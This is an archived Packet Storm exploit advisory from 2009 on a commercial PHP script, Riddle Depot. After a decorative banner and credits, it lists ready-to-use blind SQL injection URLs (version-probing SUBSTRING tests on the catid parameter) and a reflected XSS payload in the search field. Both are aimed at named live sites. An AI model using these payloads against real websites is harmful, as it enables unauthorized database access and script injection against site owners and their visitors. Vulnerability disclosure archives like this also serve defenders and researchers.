Riddle Depot SQL Injection / XSS

2009-07-20T00:00:00
ID PACKETSTORM:79384
Type packetstorm
Reporter Moudi
Modified 2009-07-20T00:00:00

Description

                                        
                                            `###########################################################################  
#-----------------------------I AM MUSLIM !!------------------------------#  
###########################################################################  
  
==============================================================================  
_ _ _ _ _ _   
/ \ | | | | / \ | | | |  
/ _ \ | | | | / _ \ | |_| |  
/ ___ \ | |___ | |___ / ___ \ | _ |  
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|  
  
  
==============================================================================  
[»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]  
==============================================================================  
[»] Riddle Depot Multiple Remote Vulnerabilities  
==============================================================================  
  
[»] Script: [ Riddle Depot ]  
[»] Language: [ PHP ]  
[»] Download: [ http://www.phpscriptsnow.com/product_info.php?cPath=21&products_id=41 ]  
[»] Founder: [ Moudi <m0udi@9.cn> ]  
[»] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]  
[»] Team: [ EvilWay ]  
[»] Dork: [ OFF ]  
[»] Price: [ $24.99 ]  
[»] Site : [ https://security-shell.ws/forum.php ]  
  
###########################################################################  
  
===[ Exploit + LIVE : BLIND SQL vulnerability ]===  
  
[»] http://www.site.com/patch/list.php?pagenum=0&catid=[BLIND]  
  
[»] http://www.phpscriptsnow.com/demo/riddles/list.php?pagenum=0&catid=4+AND%20SUBSTRING(@@version,1,1)=5 TRUE  
http://www.phpscriptsnow.com/demo/riddles/list.php?pagenum=0&catid=4+AND%20SUBSTRING(@@version,1,1)=4 FALSE  
SO MYSQL: V5  
http://riddledepot.com/list.php?pagenum=0&catid=4+AND%20SUBSTRING(@@version,1,1)=5 TRUE  
http://riddledepot.com/list.php?pagenum=0&catid=4+AND%20SUBSTRING(@@version,1,1)=4 FALSE  
SO MYSQL: V5  
  
===[ Exploit XSS + LIVE : vulnerability ]===  
  
[»] http://www.site.com/patch/results.php?searchquery=[XSS]  
  
[»] http://www.phpscriptsnow.com/demo/riddles/results.php?searchquery=1<script>alert(308297104532)</script>&search=Search  
[»] http://riddledepot.com/results.php?searchquery=1<script>alert(308297104532)</script>&search=Search  
  
  
Author: Moudi  
  
###########################################################################`